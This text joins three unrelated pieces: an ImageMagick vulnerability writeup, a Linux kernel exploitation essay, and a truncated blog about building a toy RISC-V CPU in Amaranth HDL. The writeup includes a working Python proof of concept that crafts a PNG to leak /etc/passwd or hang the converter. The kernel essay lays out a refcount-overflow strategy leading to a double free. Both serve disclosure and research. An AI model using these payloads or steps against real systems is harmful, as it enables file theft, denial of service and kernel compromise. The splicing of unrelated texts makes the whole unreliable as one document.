ImageMagick is a free and open-source software suite for displaying, converting, and editing image files. It can read and write over 200 image file formats, and it is therefore very common to find it on websites worldwide, since there is always a need to process pictures for user profiles, catalogs, and the like.
In a recent APT Simulation engagement, the Ocelot team identified that ImageMagick was used to process images on a Drupal-based website, so the team decided to look for new vulnerabilities in this component, downloading the latest version of ImageMagick, 7.1.0-49 at the time. As a result, two zero-day vulnerabilities were identified:
CVE-2022-44267: ImageMagick 7.1.0-49 is vulnerable to Denial of Service. When it parses a PNG image (e.g., for resize), the convert process could be left waiting for stdin input.
CVE-2022-44268: ImageMagick 7.1.0-49 is vulnerable to Information Disclosure. When it parses a PNG image (e.g., for resize), the resulting image could have embedded the content of an arbitrary remote file (if the ImageMagick binary has permissions to read it).
How can the vulnerabilities be exploited?
To exploit the above-mentioned vulnerabilities remotely, an attacker needs to upload a malicious image to a website that processes images with ImageMagick.
The Ocelot team is very grateful to the ImageMagick team of volunteers, who validated and released the needed patches in a timely manner.
In this blog, the technical details of the vulnerabilities are explained.
CVE-2022-44267: Denial of service
ImageMagick: 7.1.0-49
When ImageMagick parses a PNG file, for example in a resize operation when receiving an image, the convert process can be left waiting for stdin input, leading to a Denial of Service, since the process won't be able to process other images.
A malicious actor could craft a PNG, or use an existing one, and add a textual chunk type (e.g., tEXt). Such chunks carry a keyword and a text string. If the keyword is the string "profile" (without quotes), ImageMagick interprets the text string as a filename and loads the content as a raw profile. If the specified filename is "-" (a single dash), ImageMagick tries to read the content from standard input, potentially leaving the process waiting forever.
Exploitation Path Execution:
Upload image to trigger ImageMagick command, like “convert”
ReadOnePNGImage (coders/png.c:2164)
Reading “tEXt” chunk:
SetImageProperty (MagickCore/property.c:4360)
Checking if the keyword equals "profile"
Copying the text string as filename in line 4720 and saving the content in line 4722
FileToStringInfo to store the content into string_info->datum (MagickCore/string.c:1005)
CVE-2022-44268: Information Disclosure
ImageMagick: 7.1.0-49
When ImageMagick parses a PNG file, for example in a resize operation, the resulting image can have the content of an arbitrary file from the website embedded in it (if the ImageMagick binary has permission to read that file).
A malicious actor could craft a PNG, or use an existing one, and add a textual chunk type (e.g., tEXt). Such chunks carry a keyword and a text string. If the keyword is the string "profile" (without quotes), ImageMagick interprets the text string as a filename and loads the content as a raw profile; the attacker can then download the resized image, which comes with the content of the remote file embedded.
Exploitation Path Execution:
Upload image to trigger ImageMagick command, like “convert”
ReadOnePNGImage (coders/png.c:2164):
Reading tEXt chunk:
SetImageProperty (MagickCore/property.c:4360)
Checking if the keyword equals "profile"
Copying the text string as filename in line 4720 and saving the content in line 4722
FileToStringInfo to store the content into string_info->datum (MagickCore/string.c:1005)
If a valid (and accessible) filename is provided, the content is returned to the calling function (FileToStringInfo), and the StringInfo object returns to the SetImageProperty function, which saves the blob into the newly generated image via the function SetImageProfile.
This new image is then available for the attacker to download, with the content of the arbitrary website file embedded inside.
PoC: Malicious PNG content to leak “/etc/passwd” file:
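The following Python sketch illustrates the chunk layout described above (an illustration, not the original PoC; the standard struct and zlib modules are enough to build a valid PNG). Using "-" as the filename instead of "/etc/passwd" reproduces the CVE-2022-44267 denial of service:

import struct
import zlib

def chunk(chunk_type, data):
    # a PNG chunk is: length, type, data, CRC32 over type + data
    return (struct.pack(">I", len(data)) + chunk_type + data
            + struct.pack(">I", zlib.crc32(chunk_type + data)))

# minimal 1x1 grayscale image: IHDR fields plus one filtered scanline
ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
idat = zlib.compress(b"\x00\x00")

# tEXt payload: keyword "profile", NUL separator, then the "filename"
text = b"profile\x00/etc/passwd"

with open("poc.png", "wb") as f:
    f.write(b"\x89PNG\r\n\x1a\n"
            + chunk(b"IHDR", ihdr)
            + chunk(b"tEXt", text)
            + chunk(b"IDAT", idat)
            + chunk(b"IEND", b""))

When a vulnerable version processes such a file (e.g., convert poc.png out.png), the content of the named file ends up embedded as a raw profile in the resulting image, where it can be inspected, for instance, with identify -verbose.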
For a fair amount of time, null-deref bugs were a highly exploitable kernel bug class. Back when the kernel was able to access userland memory without restriction, and userland programs were still able to map the zero page, there were many easy techniques for exploiting null-deref bugs. However, with the introduction of modern exploit mitigations such as SMEP and SMAP, as well as mmap_min_addr preventing unprivileged programs from mmap'ing low addresses, null-deref bugs are generally not considered a security issue in modern kernel versions. This blog post provides an exploit technique demonstrating that treating these bugs as universally innocuous often leads to faulty evaluations of their relevance to security.
Kernel oops overview
At present, when the Linux kernel triggers a null-deref from within a process context, it generates an oops, which is distinct from a kernel panic. A panic occurs when the kernel determines that there is no safe way to continue execution, and that therefore all execution must cease. However, the kernel does not stop all execution during an oops — instead the kernel tries to recover as best as it can and continue execution. In the case of a task, that involves throwing out the existing kernel stack and going directly to make_task_dead which calls do_exit. The kernel will also publish in dmesg a “crash” log and kernel backtrace depicting what state the kernel was in when the oops occurred. This may seem like an odd choice to make when memory corruption has clearly occurred — however the intention is to allow kernel bugs to more easily be detectable and loggable under the philosophy that a working system is much easier to debug than a dead one.
The unfortunate side effect of the oops recovery path is that the kernel is not able to perform any associated cleanup that it would normally perform on a typical syscall error recovery path. This means that any locks that were locked at the moment of the oops stay locked, any refcounts remain taken, any memory otherwise temporarily allocated remains allocated, etc. However, the process that generated the oops, its associated kernel stack, task struct and derivative members etc. can and often will be freed, meaning that depending on the precise circumstances of the oops, it’s possible that no memory is actually leaked. This becomes particularly important in regards to exploitation later.
Reference count mismanagement overview
Refcount mismanagement is a fairly well-known and exploitable issue. In the case where software improperly decrements a refcount, this can lead to a classic UAF primitive. The case where software improperly doesn't decrement a refcount (leaking a reference) is also often exploitable. If the attacker can cause a refcount to be repeatedly improperly incremented, it is possible that given enough effort the refcount may overflow, at which point the software no longer has any remotely sensible idea of how many refcounts are taken on an object. In such a case, it is possible for an attacker to destroy the object by incrementing and decrementing the refcount back to zero after overflowing, while still holding reachable references to the associated memory. 32-bit refcounts are particularly vulnerable to this sort of overflow. It is important, however, that each increment of the refcount allocates little or no physical memory. Even a single-byte allocation is quite expensive if it must be performed 2^32 times.
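To make the distinction concrete, here is a toy model in plain Python (not kernel code; the saturation threshold is illustrative) contrasting a wrapping 32-bit counter with a saturating one:

MASK = 0xFFFFFFFF

def atomic_inc(count):
    # overflow-unsafe atomic_t behavior: silently wraps around
    return (count + 1) & MASK

def refcount_inc(count, saturated=0xC0000000):
    # refcount_t behavior: pins itself at a saturation value instead of wrapping
    return count if count >= saturated else count + 1

count = MASK                 # the state after ~2^32 leaked increments
count = atomic_inc(count)
assert count == 0            # object looks unreferenced despite live references
assert refcount_inc(0xC0000000) == 0xC0000000  # the saturating counter never wraps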
Example null-deref bug
When a kernel oops unceremoniously ends a task, any refcounts that the task was holding remain held, even though all memory associated with the task may be freed when the task exits. Let’s look at an example — an otherwise unrelated bug I coincidentally discovered in the very recent past:
static int show_smaps_rollup(struct seq_file *m, void *v)
{
    struct proc_maps_private *priv = m->private;
    struct mem_size_stats mss;
    struct mm_struct *mm;
    struct vm_area_struct *vma;
    unsigned long last_vma_end = 0;
    int ret = 0;

    priv->task = get_proc_task(priv->inode); // task reference taken
    if (!priv->task)
        return -ESRCH;

    mm = priv->mm; // with no VMAs, mm->mmap is NULL
    if (!mm || !mmget_not_zero(mm)) { // mm reference taken
        ret = -ESRCH;
        goto out_put_task;
    }

    memset(&mss, 0, sizeof(mss));

    ret = mmap_read_lock_killable(mm); // mmap read lock taken
    if (ret)
        goto out_put_mm;

    hold_task_mempolicy(priv);

    for (vma = priv->mm->mmap; vma; vma = vma->vm_next) {
        smap_gather_stats(vma, &mss);
        last_vma_end = vma->vm_end;
    }

    show_vma_header_prefix(m, priv->mm->mmap->vm_start,
                           last_vma_end, 0, 0, 0, 0); // the deref of mmap causes a kernel oops here

    seq_pad(m, ' ');
    seq_puts(m, "[rollup]\n");

    __show_smap(m, &mss, true);

    release_task_mempolicy(priv);
    mmap_read_unlock(mm);

out_put_mm:
    mmput(mm);
out_put_task:
    put_task_struct(priv->task);
    priv->task = NULL;
    return ret;
}
This file is intended simply to print a set of memory usage statistics for the respective process. Regardless, this bug report reveals a classic and otherwise innocuous null-deref bug within this function. In the case of a task that has no VMAs mapped at all, the task's mm_struct mmap member will be equal to NULL. Thus the priv->mm->mmap->vm_start access causes a null dereference and consequently a kernel oops. This bug can be triggered by simply reading /proc/[pid]/smaps_rollup on a task with no VMAs (which itself can be stably created via ptrace).
This kernel oops will mean that the following events occur:
1. The associated struct file will have a refcount leaked if fdget took a refcount (we'll try and make sure this doesn't happen later).
2. The associated seq_file within the struct file has a mutex that will forever be locked (any future reads/writes/lseeks etc. will hang forever).
3. The task struct associated with the smaps_rollup file will have a refcount leaked.
4. The mm_struct's mm_users refcount associated with the task will be leaked.
5. The mm_struct's mmap lock will be permanently readlocked (any future write-lock attempts will hang forever).
Each of these conditions is an unintentional side-effect that leads to buggy behaviors, but not all of those behaviors are useful to an attacker. The permanent locking in conditions 2 and 5 only makes exploitation more difficult. Condition 1 is unexploitable because we cannot leak the struct file refcount again without taking a mutex that will never be unlocked. Condition 3 is unexploitable because a task struct uses a safe saturating kernel refcount_t, which prevents the overflow condition. This leaves condition 4.
The mm_users refcount still uses an overflow-unsafe atomic_t, and since we can take a readlock an indefinite number of times, the associated mmap_read_lock does not prevent us from incrementing the refcount again. There are a couple of important roadblocks we need to avoid in order to repeatedly leak this refcount:
1. We cannot call this syscall from the task with the empty VMA list itself; in other words, we can't call read from /proc/self/smaps_rollup. Such a process cannot easily make repeated syscalls since it has no virtual memory mapped. We avoid this by reading smaps_rollup from another process.
2. We must re-open the smaps_rollup file every time, because any future reads we perform on a smaps_rollup instance we already triggered the oops on will deadlock on the local seq_file mutex, which is locked forever. We also need to destroy the resulting struct file (via close) after we generate the oops in order to prevent untenable memory usage.
3. If we access the mm through the same pid every time, we will run into the task struct max refcount before we overflow the mm_users refcount. Thus we need to create two separate tasks that share the same mm and balance the oopses we generate across both tasks, so that the task refcounts grow half as quickly as the mm_users refcount. We do this via the clone flag CLONE_VM.
4. We must avoid opening/reading the smaps_rollup file from a task that has a shared file descriptor table, as otherwise a refcount will be leaked on the struct file itself. This isn't difficult; just don't read the file from a multi-threaded process.
Our final refcount leaking overflow strategy is as follows:
1. Process A forks a process B.
2. Process B issues PTRACE_TRACEME so that when it segfaults upon return from munmap it won't go away (but rather will enter tracing stop).
3. Process B clones with CLONE_VM | CLONE_PTRACE another process C.
4. Process B munmaps its entire virtual memory address space; this also unmaps process C's virtual memory address space.
5. Process A forks new children D and E which will access (B|C)'s smaps_rollup file respectively.
6. (D|E) opens (B|C)'s smaps_rollup file and performs a read, which will oops, causing (D|E) to die. mm_users will be refcount leaked/incremented once per oops.
7. Process A goes back to step 5 ~2^32 times.
The above strategy can be rearchitected to run in parallel (across processes, not threads, because of roadblock 4) to improve performance. On server setups that print kernel logging to a serial console, generating 2^32 kernel oopses takes over 2 years. However, on a vanilla Kali Linux box using a graphical interface, a demonstrative proof-of-concept takes only about 8 days to complete! At the completion of execution, the mm_users refcount will have overflowed and be set to zero, even though this mm is currently in use by multiple processes and can still be referenced via the proc filesystem.
Exploitation
Once the mm_users refcount has been set to zero, triggering undefined behavior and memory corruption should be fairly easy. By triggering an mmget and an mmput (which we can very easily do by opening the smaps_rollup file once more) we should be able to free the entire mm and cause a UAF condition.
Unfortunately, since 64591e8605 (“mm: protect free_pgtables with mmap_lock write lock in exit_mmap”), exit_mmap unconditionally takes the mmap lock in write mode. Since this mm’s mmap_lock is permanently readlocked many times, any calls to __mmput will manifest as a permanent deadlock inside of exit_mmap.
However, before the call permanently deadlocks, it will call several other functions:
uprobe_clear_state
exit_aio
ksm_exit
khugepaged_exit
Additionally, we can call __mmput on this mm from several tasks simultaneously by having each of them trigger an mmget/mmput on the mm, generating irregular race conditions. Under normal execution, it should not be possible to trigger multiple __mmput’s on the same mm (much less concurrent ones) as __mmput should only be called on the last and only refcount decrement which sets the refcount to zero. However, after the refcount overflow, all mmget/mmput’s on the still-referenced mm will trigger an __mmput. This is because each mmput that decrements the refcount to zero (despite the corresponding mmget being why the refcount was above zero in the first place) believes that it is solely responsible for freeing the associated mm.
This racy __mmput primitive extends to its callees as well. exit_aio is a good candidate for taking advantage of this:
void exit_aio(struct mm_struct *mm)
{
    struct kioctx_table *table = rcu_dereference_raw(mm->ioctx_table);
    struct ctx_rq_wait wait;
    int i, skipped;

    if (!table)
        return;

    atomic_set(&wait.count, table->nr);
    init_completion(&wait.comp);

    skipped = 0;

    for (i = 0; i < table->nr; ++i) {
        struct kioctx *ctx =
            rcu_dereference_protected(table->table[i], true);

        if (!ctx) {
            skipped++;
            continue;
        }

        ctx->mmap_size = 0;
        kill_ioctx(mm, ctx, &wait);
    }

    if (!atomic_sub_and_test(skipped, &wait.count)) {
        /* Wait until all IO for the context are done. */
        wait_for_completion(&wait.comp);
    }

    RCU_INIT_POINTER(mm->ioctx_table, NULL);
    kfree(table);
}
While the callee function kill_ioctx is written in such a way as to prevent concurrent execution from causing memory corruption (part of the contract of aio allows for kill_ioctx to be called concurrently), exit_aio itself makes no such guarantees. Two concurrent calls of exit_aio on the same mm struct can consequently induce a double free of the mm->ioctx_table object, which is fetched at the beginning of the function but only freed at the very end. This race window can be widened substantially by creating many aio contexts in order to slow down exit_aio's internal context-freeing loop. Successful exploitation will trigger a kernel BUG indicating that a double free has occurred.
Note that as this exit_aio path is hit from __mmput, triggering this race will produce at least two permanently deadlocked processes when those processes later try to take the mmap write lock. However, from an exploitation perspective, this is irrelevant as the memory corruption primitive has already occurred before the deadlock occurs. Exploiting the resultant primitive would probably involve racing a reclaiming allocation in between the two frees of the mm->ioctx_table object, then taking advantage of the resulting UAF condition of the reclaimed allocation. It is undoubtedly possible, although I didn’t take this all the way to a completed PoC.
Conclusion
While the null-dereference bug itself was fixed in October 2022, the more important fix was the introduction of an oops limit which causes the kernel to panic if too many oopses occur. While this patch is already upstream, it is important that distributed kernels also inherit this oops limit and backport it to LTS releases if we want to avoid treating such null-dereference bugs as full-fledged security issues in the future. Even in that best-case scenario, it is nevertheless highly beneficial for security researchers to carefully evaluate the side-effects of bugs discovered in the future that are similarly “harmless” and ensure that the abrupt halt of kernel code execution caused by a kernel oops does not lead to other security-relevant primitives.
I always wanted to understand how a CPU works, how it transitions from one instruction to the next and makes a computer work. So after reading Ken Shirriff's blog about a bug fix in the 8086 processor I thought: well, let's try to write one in a hardware description language. This post is a write-up of my learning experiment.
I’ll walk through my steps of creating an emulator, compiling and linking C for bare metal, CPU design and finally the implementation of my toy RISC-V CPU.
Goals
implement a CPU in a hardware description language (HDL),
code must be synthesizable (except memory),
simulate it,
and run a bare metal C program on it.
While I had plenty of research time, I had only about 30 hours of development time. Without prior hardware design experience, the goals had to be simple enough:
RISC-V integer instruction set only (minus system and break calls).
In a future iteration I plan to run my project on a real FPGA and implement a memory controller. Let’s say I made it to about 85% of what I wanted to achieve.
Write an emulator
Writing an emulator, i.e. a program that can execute the instructions of a CPU, is an excellent stepping stone towards a hardware implementation. For me, without a hardware background, it was much easier to reason about and learn the instruction set this way.
So my first step was to understand the RISC-V instruction set. The RISC-V specification is quite long, but I only needed chapters 2 (integer instruction set), 19 (RV32/64G instruction set listings) and 20 (assembly programmer's handbook). These give detailed definitions of how each instruction must be executed, what kind of registers must be implemented, etc.
Let's look at an example: arithmetic / logical instructions operating on a register and an immediate value. For ADDI (add immediate) the following is done: rd <- rs1 + imm. The register identified by rd is set to the sum of the value stored in register rs1 and the value given in the instruction itself.
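As a toy model of what the emulator does here (sketched in Python, while the emulator itself is C++), decoding and executing ADDI from a raw 32-bit instruction word looks roughly like this:

def sign_extend(value, bits):
    # interpret the low `bits` bits of value as a two's complement number
    return value - (1 << bits) if value & (1 << (bits - 1)) else value

def execute_addi(instruction, registers):
    # I-type layout: imm[11:0] | rs1 | funct3 | rd | opcode
    # (the opcode / funct3 dispatch happens in the emulator's nested switch)
    rd = (instruction >> 7) & 0x1F
    rs1 = (instruction >> 15) & 0x1F
    imm = sign_extend(instruction >> 20, 12)
    if rd != 0:  # x0 is hard-wired to zero
        registers[rd] = (registers[rs1] + imm) & 0xFFFFFFFF

regs = [0] * 32
regs[1] = 40
execute_addi(0x00208113, regs)  # addi x2, x1, 2
assert regs[2] == 42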
The emulator is implemented in C++ with a C-style interface in a shared library. This makes it easy to hook it into Python via cffi. This saved me quite a bit of time for file system and user interactions, which were all done in Python.
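The glue on the Python side then only needs a few lines of cffi (a sketch: the function and library names here are made up; the real interface lives in the repository):

from cffi import FFI

ffi = FFI()
ffi.cdef("""
    void *emulator_new(void);
    void emulator_step(void *emu);  /* execute exactly one instruction */
""")
lib = ffi.dlopen("./libemulator.so")  # hypothetical library name

emu = lib.emulator_new()
lib.emulator_step(emu)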
The core of the emulator is a step function, which executes exactly one instruction and then returns. In RISC-V each instruction is exactly 32 bits. The function first decodes the op code (what kind of operation) and then the specific operation (e.g. ADD immediate). It's a large, nested switch.
The mathematical and logical operations are the simplest to implement, so I started with them. Iteratively I added branches, jumps and the remaining logic until I had covered all instructions other than ECALL and EBREAK. These two were not necessary for my bare metal experiment.
For testing I relied on simple hand-written assembly code. Of course this did not exercise my emulator thoroughly, so as a next step I wanted to finally run my Conway's Game of Life simulation.
Cross compiling, linking and ELF to bin
Going from C to a bare metal CPU takes a few steps: cross compiling, ensuring a proper memory layout, and converting the ELF file to a binary blob. Also, instead of having a main function, my code has a _start function defined as follows:
void __attribute__((section (".text.boot"))) _start() {
    run(); // call the actual "entrypoint"
}
I’ll explain the details later.
My CPU only supports the RISC-V 32-bit integer instruction set, but my host system is running on x86-64. So I needed a cross compiler and used the Ubuntu package gcc-riscv64-unknown-elf. Then I could compile my code with an invocation of riscv64-unknown-elf-gcc using the following options:
- target the rv32i architecture, i.e. the RISC-V 32-bit integer instruction set (-march=rv32i),
- define the application binary interface, i.e. the conventions for how to emit assembly, so that integers, longs and pointers are 32 bit (-mabi=ilp32); together with the cross compiler itself, these three are needed to emit code compatible with my emulator and later the CPU,
- compile without a standard library (-nostdlib): standard libraries like the system libc assume operating system support, but my toy CPU will be running bare metal, so we have to switch that off. This means we won't have access to malloc, printf, puts etc.; instead we'll need to implement these ourselves if we want to use them. It also means we have no startup code.
- compile freestanding (-ffreestanding): do not assume the presence of an operating system or library, and switch off libc-specific optimizations and defaults. For example, we won't have a main function, which is otherwise required.
- use a memory map (via a linker script): we need to tell the compiler and linker where instructions and global variables will be placed in memory, since we do not have a loader to do this at application startup.
Even though we do not yet have any hardware, we must make a few decisions for that last item: what should our address space look like?
program execution starts at 0x1000, which below I’ll call rom for read-only-memory
memory for globals, stack variables and heap will be located at 0x10000000
These values are kind of arbitrary. I wanted to avoid having code at address zero, to avoid issues with NULL pointers. The linker script also ensures that our program entry point, the function _start, is placed at 0x1000, so that the emulator will execute that code first. Here's my linker script for my address space setup:
ENTRY(_start)

MEMORY
{
    rom (rx) : ORIGIN = 0x00001000, LENGTH = 16M
    ram (rw) : ORIGIN = 0x10000000, LENGTH = 32M
}

SECTIONS
{
    .text : {
        /*
         * The entry point is expected to be the first function here.
         * --> we are assuming there's only a single function in the
         * .text.boot segment, and by convention that is "_start".
         * KEEP ensures that "_start" is kept here, even if there are
         * no references to it.
         */
        KEEP(*(.text.boot))
        /* all other code follows */
        *(.text*)
    } > rom
    .rodata : { *(.rodata*) } > rom
    .bss : { *(.bss*) } > ram
}
Now the “problem” is that gcc generates an ELF file and not just a stream of instructions. The Executable and Linkable Format is, simplified, a container to store executable code, data and metadata in a way that makes it easy to later load into memory, as specified by a memory map like the one above. Since my program is fairly simple, it does not need memory initialization, so we can simply dump the RISC-V instructions from the .text segment into a binary file (e.g. with objcopy -O binary). Recall that _start was placed into the special .text.boot section: the linker script instructs the toolchain to make sure this code is placed at 0x1000, even when no other code references it. By having exactly one function in .text.boot, this is guaranteed to happen.
It turns out this is still not enough to make the code work: the startup code above does not initialize the stack pointer, i.e. where local variables live in memory. I decided to simplify things and hard-code the initial stack pointer value in my emulator and CPU. This means simply setting register x2, also known as sp, to the end of the memory, here 0x12000000.
A couple of other registers defined in the ABI with a special purpose are not used by my program, so I did not implement support for them: the global pointer gp and the thread pointer tp.
No standard library
When the program is running on my host, I rely on the standard library for memory allocation like malloc, or putchar for output. But when running bare metal these functions are not available.
I've replaced dynamic memory allocation with static memory assignments. Since my program is the only one running on the CPU, I can use all resources how I see fit. The flag FREESTANDING is set when the program is compiled for my RISC-V emulator / CPU; without it, the program can run as-is on my host system like any other program.
For output to the console, my program assumes that the address of the variable leds is memory-mapped to an external LED array. In the case of the emulator, it will simply read this memory area and display it on the console. When running in the simulator (or on an FPGA in the next iteration), the memory controller will set output pins accordingly.
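Sketched in Python, the emulator-side display can be as simple as the following (a sketch only: the address and dimensions of leds are illustrative, and read_byte stands in for however the emulator exposes its memory):

LEDS_ADDR = 0x10000000          # illustrative: wherever the linker placed `leds`
LEDS_WIDTH, LEDS_HEIGHT = 32, 16

def draw_leds(read_byte):
    # read_byte(address) -> int is assumed to expose emulator memory
    for y in range(LEDS_HEIGHT):
        row = ""
        for x in range(LEDS_WIDTH):
            value = read_byte(LEDS_ADDR + y * LEDS_WIDTH + x)
            row += "#" if value else "."
        print(row)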
Emulator in action
Here's the result of all that work: first setting a breakpoint for each Game of Life cycle, and then manually stepping through the program on the emulated CPU.
CPU overview
With the emulator completed, I now have a working reference system to debug my CPU. And so I started implementing it.
A simple CPU consists of the following components:
Arithmetic Logic Unit (ALU): the compute part, for operations like “add” or “xor”
Register File: provides and stores register values
Decoder: transform instruction to a set of control signals, controlling the CPU operation
Program Counter: manages the address where the next instruction is found
Load Store Unit (LSU): connects the CPU to its memory
Control Unit: tying all the parts together to form a CPU
These are the basic elements of a CPU and sufficient for my toy RISC-V implementation.
Describing hardware in code
Hardware is designed with special programming languages, called hardware description languages (HDL). The most common ones are Verilog and VHDL. For my project I decided to use Amaranth HDL, because it's higher level and easier to use, plus it's written in my favorite language, Python. Simplified: it enables an engineer to write a Python program that generates a hardware description, instead of describing the hardware directly in Verilog or VHDL. A nice property of Amaranth HDL is that, by design, the resulting programs are synthesizable, i.e. they can be "compiled" into a description executable on FPGAs or built as an ASIC.
A key difference between software and hardware is concurrency: in software, code is executed line by line, in order, and we need special constructs like threads to achieve parallelism. In hardware it's different: everything is happening at the same time. We are not describing high-level operations, but rather how logic gates are connected to each other.
Combinational logic
There are two key concepts in hardware: combinational logic (sometimes also called combinatorial logic) and synchronous logic. Simplified, combinational logic executes all the time, and all at the same time. In the following example, green marks input signals, yellow marks internal signals (output of logic and input to the next logic), blue marks logic and orange marks the final output signal:
Combinational logic always updates its output immediately when any input changes. (There are a couple of physical limitations here, but we'll simplify this for now.) This means changing any input signal will immediately change the output signal sum.
In Amaranth we can implement this as:

# to run tests: python3 -m pytest add3.py
import pytest
from amaranth import Signal, Module, Elaboratable
from amaranth.build import Platform
from amaranth.sim import Simulator, Settle


class Add3Comb(Elaboratable):
    def __init__(self):
        self.count_1 = Signal(32)
        self.count_2 = Signal(32)
        self.count_3 = Signal(32)
        self.result = Signal(32)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        # technically this is not needed: a second `+` below would do
        # but let's build the circuit exactly as shown above
        temp_sum = Signal(32)

        # define how our logic works
        m.d.comb += temp_sum.eq(self.count_1 + self.count_2)
        m.d.comb += self.result.eq(self.count_3 + temp_sum)

        return m


def test_add3comb():
    # set up our device under test
    dut = Add3Comb()

    def bench():
        # set inputs to defined values
        yield dut.count_1.eq(7)
        yield dut.count_2.eq(14)
        yield dut.count_3.eq(21)

        # let the simulation settle down, i.e. arrive at a defined state
        yield Settle()

        # check that the sum is the expected value
        assert (yield dut.result) == 42

    sim = Simulator(dut)
    sim.add_process(bench)
    sim.run()
The two m.d.comb assignments are executed at the same time, and also whenever the inputs change.
Synchronous Logic
There's a second kind of commonly used logic: synchronous logic. The difference to combinational logic is that outputs only change on a clock edge, i.e. when the clock signal goes from low to high (positive edge) or vice versa (negative edge). Let's use the adder example again. Colors are as before, but we'll use turquoise for synchronous logic.
We use positive-edge-triggered logic here, so unless the clock goes from low to high, neither temp_sum nor result will change. The following table shows how the values change; let's furthermore assume the logic was just reset, so the outputs start at 0 (with the inputs from the test below already applied):

             count_1   count_2   count_3   temp_sum   result
after reset     7         14        21         0         0
1st edge        7         14        21        21        21
2nd edge        7         14        21        21        42

The circuit takes on the expected value only after two full clock cycles. Note that the input signals do not even need to be defined between one positive edge and the next; only their values at the edge matter for the outputs.
Physically things are more complex (“delta time”) and this results in interesting tradeoffs between the length of combinational logic paths (number of gates, circuit length) and the attainable clock speed. Luckily this does not matter for my toy CPU.
In Amaranth we can implement this as:

# additional imports needed for this example:
from amaranth import ClockDomain
from amaranth.sim import Tick


class Add3Sync(Elaboratable):
    def __init__(self):
        self.sync = ClockDomain("sync")
        self.count_1 = Signal(32)
        self.count_2 = Signal(32)
        self.count_3 = Signal(32)
        self.result = Signal(32)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        temp_sum = Signal(32)

        # define how our logic works
        m.d.sync += temp_sum.eq(self.count_1 + self.count_2)
        m.d.sync += self.result.eq(self.count_3 + temp_sum)

        return m


def test_add3sync():
    # set up our device under test
    dut = Add3Sync()

    def bench():
        # set inputs to defined values
        yield dut.count_1.eq(7)
        yield dut.count_2.eq(14)
        yield dut.count_3.eq(21)

        # let the simulation settle down, i.e. arrive at a defined state
        yield Settle()

        # no positive edge yet, so still at reset value
        assert (yield dut.result) == 0

        # trigger a positive edge on the clock and wait for things to settle down
        yield Tick()
        yield Settle()

        # count_3 is reflected in the output, since temp_sum is still zero
        assert (yield dut.result) == 21

        yield Tick()
        yield Settle()

        # now both count_3 and temp_sum are reflected in the output
        assert (yield dut.result) == 42

    sim = Simulator(dut)
    sim.add_process(bench)
    sim.add_clock(1e-6)
    sim.run()
CPU design
Armed with this knowledge I figured out which things needed to happen in parallel and which things in sequence.
So if we have an ALU-related instruction, it would work like this:
1. In parallel:
   - read the instruction from ROM at the instruction address,
   - decode the instruction,
   - read the register values and, if present, the immediate value,
   - compute the result in the ALU,
   - assign the ALU result to the destination register (not yet visible!),
   - increment the instruction address by 4 bytes (not yet visible!).
2. Wait for the positive clock edge, giving step 1 time to settle, and in the following instant:
   - update the instruction address, making the new value visible,
   - update the destination register value, making the new value visible.
3. Repeat, starting at 1.
Iteratively creating diagrams of how things should work was immensely helpful. Below is a simplified version of my CPU design, though it lacks many of the control signals and the special cases for operations related to jumping and branching. The colors are just there to help with the readability of the diagram.
Now let's talk about the CPU components in detail. Designing them reminded me a lot of functional programming, where the parameters and types of a function naturally guide the implementation. All the necessary details about the RISC-V instruction set are specified in the spec.
ALU
Compute data1 $OPERATION data2. I decided to merge the branch unit into the ALU, so there's a branch for is_branch.
class ALU(Elaboratable):
    def __init__(self):
        # if set to 0, then normal ALU operation,
        # otherwise treat funct3 as branch condition operator
        self.i_is_branch = Signal(1)

        # operation, e.g. "add" or "xor", from decoder
        self.i_funct3 = Signal(3)

        # sub-operation, e.g. "sub" for "add", from decoder
        self.i_funct7 = Signal(7)

        # value of register 1
        self.i_data1 = SignedSignal(32)

        # value of register 2 or immediate
        self.i_data2 = SignedSignal(32)

        # computation result
        self.o_result = SignedSignal(32)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        # this ALU also implements branch logic
        with m.If(self.i_is_branch == 0):
            # normal ALU
            with m.Switch(self.i_funct3):
                with m.Case(FUNCT3_OP_XOR):
                    m.d.comb += self.o_result.eq(self.i_data1 ^ self.i_data2)
                with m.Case(FUNCT3_OP_SLL):
                    shift_amount = self.i_data2[0:5]
                    m.d.comb += self.o_result.eq(
                        self.i_data1.as_unsigned() << shift_amount)
                # ...
In this snippet you can see how Amaranth is really a code generator: instead of using the normal switch and if statements, which control Python flow, you have to use the m.Switch etc. methods on the module.
Decoder
Provide all necessary signals to control execution.
class InstructionDecoder(Elaboratable):
    def __init__(self):
        self.i_instruction = Signal(32)
        self.i_instruction_address = Signal(32)

        # select signals for register file
        self.o_rs1 = Signal(5)
        self.o_rs2 = Signal(5)
        self.o_rd = Signal(5)
        self.o_rd_we = Signal(1)

        # ALU / LSU operations
        self.o_funct3 = Signal(3)
        self.o_funct7 = Signal(7)

        # immediate value
        self.o_imm = SignedSignal(32)

        # control signals
        self.o_invalid = Signal(1)
        self.o_has_imm = Signal(1)
        self.o_is_branch = Signal(1)
        self.o_is_memory = Signal(2)

    def elaborate(self, _: Platform) -> Module:
        m = Module()

        m.d.comb += self.o_invalid.eq(0)
        m.d.comb += self.o_is_branch.eq(0)

        opcode = self.i_instruction[0:7]
        with m.Switch(opcode):
            with m.Case(OPCODE_OP_IMM):
                # rd = rs1 $OP imm
                # use ALU with immediate
                m.d.comb += [
                    self.o_rd.eq(self.i_instruction[7:12]),
                    self.o_rd_we.eq(1),
                    self.o_funct3.eq(self.i_instruction[12:15]),
                    self.o_rs1.eq(self.i_instruction[15:20]),
                    self.o_rs2.eq(0),
                    # sign-extend the 12-bit immediate
                    self.o_imm.eq(self.i_instruction[20:32].as_signed()),
                    self.o_has_imm.eq(1),
                    self.o_funct7.eq(0),
                ]
            # ...
Register File
Implement 32 registers. Special case: register x0 is hard-wired to zero; this is achieved by not allowing writes to it.
I’m not sure if this is the best implementation, but it works well in simulation so far.
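Sketched in Amaranth, following the conventions of the snippets above, the approach could look roughly like this (Array, from the amaranth package, allows indexing a list of signals with another signal; details may differ from my actual implementation):

class RegisterFile(Elaboratable):
    def __init__(self):
        self.sync = ClockDomain("sync")

        # select signals: which registers to read and write
        self.i_select_rs1 = Signal(5)
        self.i_select_rs2 = Signal(5)
        self.i_select_rd = Signal(5)

        # write enable and data for the destination register
        self.i_we = Signal(1)
        self.i_data = SignedSignal(32)

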